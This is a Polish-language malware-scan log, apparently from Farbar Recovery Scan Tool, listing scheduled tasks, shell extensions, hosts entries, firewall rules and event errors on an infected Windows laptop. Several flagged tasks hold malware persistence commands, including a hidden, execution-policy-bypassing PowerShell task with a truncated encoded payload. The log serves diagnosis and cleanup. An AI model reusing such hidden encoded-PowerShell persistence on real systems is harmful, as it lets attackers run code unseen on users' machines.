ShellIconOverlayIdentifiers: [GGDriveOverlay3] -> {E68D0A52-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll [2012-06-05] (GG Network S.A.) ShellIconOverlayIdentifiers: [GGDriveOverlay4] -> {E68D0A53-3C40-4712-B90D-DCFA93FF2534} => C:\ProgramData\GG\ggdrive\ggdrive-overlay.dll [2012-06-05] (GG Network S.A.) ContextMenuHandlers1: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation) ContextMenuHandlers1: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-06-23] (Florian Heidenreich) ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2008-06-20] () ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2008-09-16] (Alexander Roshal) ContextMenuHandlers2: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation) ContextMenuHandlers2: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-06-23] (Florian Heidenreich) ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes) ContextMenuHandlers4: [EPP] -> {09A47860-11B0-4DA5-AFA5-26D86198A780} => C:\Program Files\Microsoft Security Client\shellext.dll [2016-11-14] (Microsoft Corporation) ContextMenuHandlers4: [Mp3tagShell] -> {6351E20C-35FA-4BE3-98FB-4CABF1363E12} => C:\Program Files (x86)\Mp3tag\Mp3tagShell64.dll [2017-06-23] (Florian Heidenreich) ContextMenuHandlers4: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2008-06-20] () ContextMenuHandlers4-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2008-09-16] (Alexander Roshal) ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\atiacm64.dll [2011-04-19] (Advanced Micro Devices, Inc.) ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamext.dll [2016-03-10] (Malwarebytes) ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext64.dll [2008-06-20] () ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files (x86)\WinRAR\rarext.dll [2008-09-16] (Alexander Roshal) ContextMenuHandlers1_S-1-5-21-233006258-18527085-3623643150-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\Agata\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll [2014-03-20] (GG Network S.A.) ContextMenuHandlers4_S-1-5-21-233006258-18527085-3623643150-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\Agata\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll [2014-03-20] (GG Network S.A.) ContextMenuHandlers5_S-1-5-21-233006258-18527085-3623643150-1000: [GGDriveMenu] -> {E68D0A55-3C40-4712-B90D-DCFA93FF2534} => C:\Users\Agata\AppData\Roaming\GG\ggdrive\ggdrive-menu.dll [2014-03-20] (GG Network S.A.) ==================== Zaplanowane zadania (filtrowane) ============= (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) Task: {03087A19-204A-49DE-9658-9A60F26A5204} - System32\Tasks\{A42B2110-2447-4DEC-8AA0-A96696234CAA} => C:\Program Files (x86)\HP\Digital Imaging\bin\Hpqdirec.exe [2009-05-21] (Hewlett-Packard Company) Task: {0EDBB0DE-F879-4DF5-82F4-DE68A0AB0BE2} - System32\Tasks\{6D57F10C-7C6F-47E9-AA40-25FA5112970E} => C:\Program Files (x86)\HP\Digital Imaging\bin\Hpqdirec.exe [2009-05-21] (Hewlett-Packard Company) Task: {1110BEC6-03EB-476F-AED1-AB363D9EF47A} - System32\Tasks\{502EDDC4-8358-4606-9FF6-7D8EF3B4A2CB} => C:\Program Files (x86)\HP\Digital Imaging\bin\Hpqdirec.exe [2009-05-21] (Hewlett-Packard Company) Task: {1233F3AE-C05F-4E7C-87F4-B0BBB58D2453} - System32\Tasks\{7D7A7E47-0A0D-0A7E-0511-0B7E087D1178} => C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABQAHIA (dane wartości zawierają 9996 znaków więcej). <==== UWAGA Task: {1E73184A-49CD-4339-98D5-DEC6025EB182} - System32\Tasks\WifiManager => C:\Program Files (x86)\Samsung\Easy Display Manager\WifiManager.exe [2010-11-28] (Samsung Electronics Co., Ltd.) Task: {21A9FD56-5FA3-4564-9FAE-068A55177FF5} - System32\Tasks\{1B205510-0FC7-4854-A639-2277CA1D3BAF} => C:\Program Files (x86)\Skype\Phone\Skype.exe [2014-12-11] (Skype Technologies S.A.) Task: {3054BBB5-76F7-413B-9A6B-6486C25BC762} - System32\Tasks\SAgent => C:\Program Files\Samsung\S Agent\CommonAgent.exe [2014-10-29] (Samsung Electronics CO., LTD.) Task: {335469FA-47BE-4A57-8533-4003E12A21B3} - System32\Tasks\Microsoft\Microsoft Antimalware\Microsoft Antimalware Scheduled Scan => C:\Program Files\Microsoft Security Client\\MpCmdRun.exe [2016-11-14] (Microsoft Corporation) Task: {38498DCC-8DE5-4FBC-B931-93C29662D975} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-10-10] (Adobe Systems Incorporated) Task: {3C0F6439-588F-49FC-BA0F-9836F2148267} - System32\Tasks\{778711A2-51A4-40BF-856D-ACC826CF2597} => C:\Windows\system32\pcalua.exe -a "C:\Users\Agata\Downloads\FC MpTool(04.03.08)\FC MpTool.exe" -d "C:\Users\Agata\Downloads\FC MpTool(04.03.08)" Task: {424CA60A-2587-4BE4-B091-0399A26DBA40} - System32\Tasks\{34883709-96A0-4266-A8B1-36FF487DDA53} => C:\Program Files (x86)\HP\Digital Imaging\bin\Hpqdirec.exe [2009-05-21] (Hewlett-Packard Company) Task: {4C617067-C474-4A6D-A1DD-F0F59CE6F555} - System32\Tasks\{FF520B28-D09C-4329-9B51-8517F7A15021} => C:\Program Files (x86)\Microsoft Office\OFFICE11\POWERPNT.EXE [2011-04-20] (Microsoft Corporation) Task: {5C2DF9BD-24A9-4AAE-BF01-480749FB231F} - System32\Tasks\8f5924d3f0decf6b4ab73c990a7a077b => powershell.exe -NoProfile -NoLogo -NonInteractive -ExecutionPolicy Bypass -File "C:\Windows\8f5924d3f0decf6b4ab73c990a7a077b.ps1" <==== UWAGA Task: {5F4BB55D-19E5-4B62-8F24-567E6325718D} - System32\Tasks\L0qObltTFUur => l0qoblttfuur.exe Task: {68DF0F1D-4413-495E-A32D-51761E0522BE} - System32\Tasks\{CA190B01-7F80-449C-918C-05B2ED748B1D} => C:\Windows\system32\pcalua.exe -a "C:\Users\Agata\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PWMQ8V52\JavaSetup8u111.exe" -d C:\Users\Agata\Desktop Task: {7105A300-27A0-46CE-9955-AA9820E31DF6} - System32\Tasks\{CD6345FD-ACE9-4A8D-AF8C-A2419552B51F} => C:\Program Files (x86)\Corel\Corel Graphics 12\Programs\CorelPP.exe [2004-06-10] (Corel Corporation) Task: {77E60949-61D7-4280-AA71-E6E08EDC975B} - System32\Tasks\JetCleanLoginCheckUpdate => C:\Users\Agata\Desktop\JetCleanPortable_1.5.0.129\AutoUpdate.exe Task: {7A4E0893-DA89-43D6-8E0A-ED44B1016E4E} - System32\Tasks\EasyBatteryManager => C:\Program Files (x86)\Samsung\EasyBatteryManager\EasyBatteryMgr4.exe [2010-03-29] (SAMSUNG Electronics co., LTD.) Task: {7DFF0858-6550-49BD-AC24-B7F7774D9A0F} - System32\Tasks\{DD28E022-F582-4FE4-9201-DAB6427BC1B7} => C:\Program Files (x86)\HP\Digital Imaging\bin\Hpqdirec.exe [2009-05-21] (Hewlett-Packard Company) Task: {82A03798-CC53-41FD-9DEE-7BC81EC9C476} - System32\Tasks\{5DA41BDA-2967-4AA0-A634-9A16BEB82369} => C:\Program Files (x86)\HP\Digital Imaging\bin\Hpqdirec.exe [2009-05-21] (Hewlett-Packard Company) Task: {8B24F83C-9A61-494D-99B9-24EDCDC0CB66} - System32\Tasks\Moon Manager => C:\Windows\system32\rundll32.exe "C:\Program Files\Moon Manager\Moon Manager.dll",sfaPDJrqo <==== UWAGA Task: {8E5E464B-C465-405C-95D8-2482ADB87EDD} - System32\Tasks\{EED0292C-518C-4293-84E2-EAAED2BB3C80} => C:\Program Files (x86)\HP\Digital Imaging\bin\Hpqdirec.exe [2009-05-21] (Hewlett-Packard Company) Task: {90443662-86C8-4261-86BA-25CDBFBEA3F8} - System32\Tasks\{D2DDAA20-2561-4625-851C-CFF1BB87F5C3} => C:\Program Files (x86)\HP\Digital Imaging\bin\Hpqdirec.exe [2009-05-21] (Hewlett-Packard Company) Task: {9CC4A63A-EAA9-424A-B34B-74CEDD21A5EA} - System32\Tasks\Microsoft\Windows\Windows Error Reporting\ErrorReporting => C:\\Users\\Agata\\AppData\\Roaming\\ErrorReporting\\ermgr.exe Task: {A8351280-B4B1-4B3E-86D8-82EB8BAD9710} - System32\Tasks\SamsungSupportCenter => C:\Program Files (x86)\Samsung\Samsung Support Center\SSCKbdHk.exe [2010-05-06] (SAMSUNG Electronics) Task: {ADE446E0-842A-4E34-AECF-F1E7BECA585B} - System32\Tasks\3ff2108d7185625d7293e4213106116d => sc start 3ff2108d7185625d7293e4213106116d <==== UWAGA Task: {BA404A94-0207-4466-B7AA-9733A601BB76} - System32\Tasks\{5B2AEA1E-C42D-4DBB-A265-B36CE63A0BC8} => C:\Program Files (x86)\Microsoft Office\OFFICE11\POWERPNT.EXE [2011-04-20] (Microsoft Corporation) Task: {BCE4A354-1627-425F-90A5-30899DBAC62F} - System32\Tasks\EasyDisplayMgr => C:\Program Files (x86)\Samsung\Easy Display Manager\dmhkcore.exe [2010-11-28] (Samsung Electronics Co., Ltd.) Task: {D1D7DC3F-DDA3-4170-AED0-C67B2CE827CF} - C:\Windows\System32\Tasks\EasySpeedUpManager => Command(1): "%programfiles(x86)%\Samsung\EasySpeedUpManager\EasySpeedUpManager2.exe" -> /s Task: {D1D7DC3F-DDA3-4170-AED0-C67B2CE827CF} - C:\Windows\System32\Tasks\EasySpeedUpManager => Command(2): C:\Program Files (x86)\SAMSUNG\EasySpeedUpManager\EasySpeedUpManager.exe [2010-02-10] (Samsung Electronics Co., Ltd.) Task: {DC1C396E-85AC-45A8-848A-89F723AD9623} - System32\Tasks\BatteryLifeExtender => C:\Program Files (x86)\Samsung\BatteryLifeExtender\BatteryLifeExtender.exe [2010-04-17] (Samsung Electronics. Co. Ltd.) Task: {DEB816B3-3848-48C4-B97A-E9CD66CEA153} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated) Task: {E6C73389-C263-4E62-9007-31E28F849D04} - System32\Tasks\klcp_update => C:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [2017-07-20] () Task: {ED2DF751-B92E-4298-B757-CCDB92B25565} - System32\Tasks\{1D31D6CB-A908-40CF-9AAE-AF2AACD0947C} => C:\Program Files (x86)\Nufsoft\NatureStudio\NatureStudio.exe [2010-05-20] (Nufsoft) Task: {F2370A0C-928B-4257-9AC5-FB31851337F0} - System32\Tasks\{4800CCAB-66F4-48BD-BAF4-4553B3192C18} => C:\Program Files (x86)\HP\Digital Imaging\bin\Hpqdirec.exe [2009-05-21] (Hewlett-Packard Company) Task: {F262112D-53AD-43BC-AEBC-D1D1D40B93DC} - System32\Tasks\{F78A2664-E1A9-4B7E-8F72-CFF719347989} => C:\Program Files (x86)\HP\Digital Imaging\bin\Hpqdirec.exe [2009-05-21] (Hewlett-Packard Company) Task: {FEA84312-C5C3-400E-BCA2-8436BFB67093} - System32\Tasks\advSRS4 => C:\Program Files (x86)\Samsung\Samsung Recovery Solution 4\WCScheduler.exe [2010-01-19] (SEC) Task: {FF6554B1-DAA2-4D59-B45E-28835F1548C4} - System32\Tasks\{D74CF746-1014-4D2F-816B-CD2162E30EFD} => C:\Program Files (x86)\HP\Digital Imaging\bin\Hpqdirec.exe [2009-05-21] (Hewlett-Packard Company) (Załączenie wejścia w fixlist spowoduje przesunięcie pliku zadania (.job). Plik uruchamiany docelowo przez zadanie nie zostanie przeniesiony.) ==================== Skróty & WMI ======================== (Wybrane wejścia mogą zostać załączone w celu ich zresetowania lub usunięcia.) ==================== Załadowane moduły (filtrowane) ============== 2014-07-11 15:15 - 2006-02-23 11:35 - 000020480 _____ () C:\Windows\System32\FritzColorPort64.dll 2014-07-11 15:15 - 2006-02-22 10:39 - 000020480 _____ () C:\Windows\System32\FritzPort64.dll 2010-09-10 15:46 - 2008-06-20 00:41 - 000062464 _____ () C:\Program Files (x86)\WinRAR\rarext64.dll 2010-06-01 07:15 - 2009-03-05 11:54 - 000311296 _____ () C:\Windows\SysWOW64\Rezip.exe 2010-12-18 17:57 - 2010-06-15 18:08 - 000861696 _____ () C:\Windows\SysWOW64\atwtusb.exe 2017-10-13 01:25 - 2017-10-13 01:25 - 000711168 _____ () C:\Users\Agata\AppData\Local\Temp\is-363KE.tmp\m53tfii2wrl.tmp 2017-10-13 01:25 - 2017-10-13 01:25 - 000711168 _____ () C:\Users\Agata\AppData\Local\Temp\is-JEBP1.tmp\ca2cups2kwo.tmp 2017-10-13 01:25 - 2008-10-15 16:44 - 000205312 _____ () C:\Users\Agata\AppData\Local\Temp\is-ARH6H.tmp\itdownload.dll 2017-10-13 01:25 - 2008-10-15 16:44 - 000205312 _____ () C:\Users\Agata\AppData\Local\Temp\is-M3GPQ.tmp\itdownload.dll ==================== Alternate Data Streams (filtrowane) ========= (Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.) AlternateDataStreams: C:\ProgramData\TEMP:07BF512B [135] AlternateDataStreams: C:\ProgramData\TEMP:BFE23423 [362] ==================== Tryb awaryjny (filtrowane) =================== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.) ==================== Powiązania plików (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.) ==================== Internet Explorer - Witryny zaufane i z ograniczeniami =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.) IE trusted site: HKU\S-1-5-21-233006258-18527085-3623643150-1000\...\adobe.com -> hxxp://get.adobe.com ==================== Hosts - zawartość: ========================== (Użycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.) 2016-04-10 09:28 - 2017-10-12 17:47 - 000001504 _____ C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 cpm.paneladmin.pro 127.0.0.1 publisher.hmdiadmingate.xyz 127.0.0.1 distribution.hmdiadmingate.xyz 127.0.0.1 hmdicrewtracksystem.xyz 127.0.0.1 linkmate.space 127.0.0.1 space1.adminpressure.space 127.0.0.1 trackpressure.website 127.0.0.1 doctorlink.space 127.0.0.1 plugpackdownload.net 127.0.0.1 texttotalk.org 127.0.0.1 gambling577.xyz 127.0.0.1 htagdownload.space 127.0.0.1 mybcnmonetize.com 127.0.0.1 360devtraking.website 127.0.0.1 dscdn.pw 127.0.0.1 beautifllink.xyz 127.0.0.1 wemsofts.com 127.0.0.1 bongadoom.com 127.0.0.1 wepcmainsystem.com 127.0.0.1 internalcampaigntargets.com 127.0.0.1 bongadoom.com 127.0.0.1 getthefilenow.com 127.0.0.1 bigpicturepop.com 127.0.0.1 wizzcaster.com 127.0.0.1 bestoffersfortoday.com 127.0.0.1 wepcmainsystem.com 127.0.0.1 agent.wizztrakys.com 127.0.0.1 csdimonetize.com 127.0.0.1 dl.azalee.site 127.0.0.1 titiaredh.com ==================== Inne obszary ============================ (Obecnie brak automatycznej naprawy dla tej sekcji.) HKU\S-1-5-21-233006258-18527085-3623643150-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Agata\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg DNS Servers: 192.168.178.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 2) (EnableLUA: 1) Zapora systemu Windows [funkcja włączona] ==================== MSCONFIG/TASK MANAGER - Wyłączone elementy == MSCONFIG\startupreg: IPLA! => C:\Program Files (x86)\ipla\ipla.exe /autorun MSCONFIG\startupreg: Spotify => "C:\Users\Agata\AppData\Roaming\Spotify\Spotify.exe" -autostart -minimized MSCONFIG\startupreg: Spotify Web Helper => "C:\Users\Agata\AppData\Roaming\Spotify\SpotifyWebHelper.exe" ==================== Reguły Zapory systemu Windows (filtrowane) =============== (Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.) FirewallRules: [SPPSVC-In-TCP-NoScope] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [SPPSVC-In-TCP] => (Allow) %SystemRoot%\system32\sppsvc.exe FirewallRules: [{E8132787-1762-40CB-81D6-C14FEE23A8E5}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [{E78833ED-6921-4E3F-AAE2-DC07F3E0F5BD}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe FirewallRules: [TCP Query User{4D92F12C-AED5-4C45-B6D3-9A6ED18CEBB4}C:\users\agata\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\agata\appdata\roaming\spotify\spotify.exe FirewallRules: [UDP Query User{E71FDE8A-04A2-4FF6-A34E-96E4110EF683}C:\users\agata\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\agata\appdata\roaming\spotify\spotify.exe FirewallRules: [TCP Query User{434778BC-8A0D-4EB3-8ABC-07835982BCC6}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe FirewallRules: [UDP Query User{4868A152-3509-4AE3-A684-5FCA24CB4D16}C:\program files (x86)\mozilla firefox\firefox.exe] => (Block) C:\program files (x86)\mozilla firefox\firefox.exe FirewallRules: [TCP Query User{D1328E6F-29EC-44F1-B222-5BDF72E25E58}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [UDP Query User{5509DE29-3095-41AE-B157-DB33C15E3274}C:\program files (x86)\skype\phone\skype.exe] => (Allow) C:\program files (x86)\skype\phone\skype.exe FirewallRules: [{D2F9EACD-F4C5-463A-B366-A06FDCA3CE96}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{EF1919FE-EBBC-487E-A7B8-898696EAD456}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe FirewallRules: [{69DE898E-15E9-4E87-894F-9B46672D6BED}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{C29D772B-6962-44D7-8BD4-41D47274E838}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe FirewallRules: [{211AB06B-C498-47BF-9D38-823044E2DC43}] => (Allow) C:\Windows\system32\rundll32.exe FirewallRules: [{A50367E9-4A31-4613-A0D5-17FC7AE15F38}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{FACA8480-F27B-4A21-AD41-B1DC67E58671}] => (Allow) C:\Windows\System32\rundll32.exe FirewallRules: [{F739C4E9-475C-4A5B-9C90-27E47476D396}] => (Allow) C:\Windows\rss\csrss.exe ==================== Punkty Przywracania systemu ========================= 07-10-2017 18:12:14 Windows Update 11-10-2017 18:39:11 Windows Update 12-10-2017 17:55:50 Microsoft Antimalware Checkpoint 12-10-2017 22:30:14 Operacja przywracania 12-10-2017 23:47:39 Windows Update 13-10-2017 01:05:33 Operacja przywracania ==================== Wadliwe urządzenia w Menedżerze urządzeń ============= Name: Zewnętrzne urządzenie Bluetooth Description: Zewnętrzne urządzenie Bluetooth Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. Name: Teredo Tunneling Pseudo-Interface Description: Karta tunelowania Teredo firmy Microsoft Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318} Manufacturer: Microsoft Service: tunnel Problem: : This device cannot start. (Code10) Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device. On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard. Name: Zewnętrzne urządzenie Bluetooth Description: Zewnętrzne urządzenie Bluetooth Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. Name: Photosmart C7200 series Description: Photosmart C7200 series Class Guid: {6bdd1fc6-810f-11d0-bec7-08002be2092f} Manufacturer: HP Service: StillCam Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Photosmart C7200 series Description: Photosmart C7200 series Class Guid: {4d36e971-e325-11ce-bfc1-08002be10318} Manufacturer: HP Service: Problem: : This device is disabled. (Code 22) Resolution: In Device Manager, click "Action", and then click "Enable Device". This starts the Enable Device wizard. Follow the instructions. Name: Zewnętrzne urządzenie Bluetooth Description: Zewnętrzne urządzenie Bluetooth Class Guid: Manufacturer: Service: Problem: : The drivers for this device are not installed. (Code 28) Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard. ==================== Błędy w Dzienniku zdarzeń: ========================= Dziennik Aplikacja: ================== Error: (10/13/2017 02:33:01 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4110) (User: ) Description: Nie można dodać certyfikatu do magazynu głównych urzędów certyfikacji innej firmy z powodu błędu: Odmowa dostępu. Error: (10/13/2017 01:35:56 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4110) (User: ) Description: Nie można dodać certyfikatu do magazynu głównych urzędów certyfikacji innej firmy z powodu błędu: Odmowa dostępu. Error: (10/13/2017 01:35:56 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4110) (User: ) Description: Nie można dodać certyfikatu do magazynu głównych urzędów certyfikacji innej firmy z powodu błędu: Odmowa dostępu. Error: (10/13/2017 01:35:54 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4110) (User: ) Description: Nie można dodać certyfikatu do magazynu głównych urzędów certyfikacji innej firmy z powodu błędu: Odmowa dostępu. Error: (10/13/2017 01:35:53 AM) (Source: Microsoft-Windows-CAPI2) (EventID: 4110) (User: ) Description: Nie można dodać certyfikatu do magazynu głównych urzędów certyfikacji innej firmy z powodu błędu: Odmowa dostępu. Error: (10/13/2017 01:31:22 AM) (Source: SideBySide) (EventID: 80) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „C:\Program Files (x86)\Audacity\audacity.exe”. Błąd w pliku manifestu lub w pliku zasad „” w wierszu . Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest. Składnik 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest. Error: (10/13/2017 01:31:22 AM) (Source: SideBySide) (EventID: 80) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „C:\Program Files (x86)\Audacity\audacity.exe”. Błąd w pliku manifestu lub w pliku zasad „” w wierszu . Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest. Składnik 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest. Error: (10/13/2017 01:31:02 AM) (Source: SideBySide) (EventID: 80) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „C:\Program Files (x86)\Audacity\audacity.exe”. Błąd w pliku manifestu lub w pliku zasad „” w wierszu . Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest. Składnik 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest. Error: (10/13/2017 01:30:43 AM) (Source: SideBySide) (EventID: 80) (User: ) Description: Nie można wygenerować kontekstu aktywacji dla „C:\Program Files (x86)\Audacity\audacity.exe”. Błąd w pliku manifestu lub w pliku zasad „” w wierszu . Wersja składnika wymagana przez aplikację powoduje konflikt z inną wersją składnika, która jest już aktywna. Składniki powodujące konflikt: Składnik 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest. Składnik 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest. Error: (10/12/2017 11:20:49 PM) (Source: Microsoft-Windows-CAPI2) (EventID: 4110) (User: ) Description: Nie można dodać certyfikatu do magazynu głównych urzędów certyfikacji innej firmy z powodu błędu: Odmowa dostępu. Dziennik System: ============= Error: (10/13/2017 01:29:55 AM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa KeService niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. Error: (10/13/2017 01:29:19 AM) (Source: Service Control Manager) (EventID: 7022) (User: ) Description: Usługa Windows Update zawiesiła się podczas uruchamiania. Error: (10/13/2017 01:22:47 AM) (Source: Microsoft Antimalware) (EventID: 2004) (User: ) Description: Produkt Narzędzia firmy Microsoft chroniące przed złośliwym oprogramowaniem napotkał błąd podczas próby załadowania podpisów i podejmie próbę powrotu do znanego zestawu dobrych podpisów. Podpisy objęte próbą: Bieżące Kod błędu: 0x80070002 Opis błędu: Nie można odnaleźć określonego pliku. Wersja podpisu: 0.0.0.0;0.0.0.0 Wersja aparatu: 0.0.0.0 Error: (10/13/2017 01:07:14 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: Serwer {51FA2736-5DEE-11D4-98E8-006008BF430C} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (10/13/2017 12:59:17 AM) (Source: Microsoft-Windows-LanguagePackSetup) (EventID: 1000) (User: ZARZĄDZANIE NT) Description: Inicjacja klienta CBS nie powiodła się. Ostatni błąd: 0x80080005 Error: (10/13/2017 12:59:16 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: Serwer {752073A1-23F2-4396-85F0-8FDB879ED0ED} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (10/13/2017 12:37:47 AM) (Source: DCOM) (EventID: 10010) (User: ) Description: Serwer {51FA2736-5DEE-11D4-98E8-006008BF430C} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (10/12/2017 11:06:09 PM) (Source: Microsoft Antimalware) (EventID: 2004) (User: ) Description: Produkt Narzędzia firmy Microsoft chroniące przed złośliwym oprogramowaniem napotkał błąd podczas próby załadowania podpisów i podejmie próbę powrotu do znanego zestawu dobrych podpisów. Podpisy objęte próbą: Bieżące Kod błędu: 0x80070002 Opis błędu: Nie można odnaleźć określonego pliku. Wersja podpisu: 0.0.0.0;0.0.0.0 Wersja aparatu: 0.0.0.0 Error: (10/12/2017 10:31:10 PM) (Source: DCOM) (EventID: 10010) (User: ) Description: Serwer {51FA2736-5DEE-11D4-98E8-006008BF430C} nie zarejestrował się w modelu DCOM w wymaganym czasie. Error: (10/12/2017 10:11:12 PM) (Source: Service Control Manager) (EventID: 7034) (User: ) Description: Usługa KeService niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. CodeIntegrity: =================================== Date: 2016-07-14 23:07:36.639 Description: Code Integrity 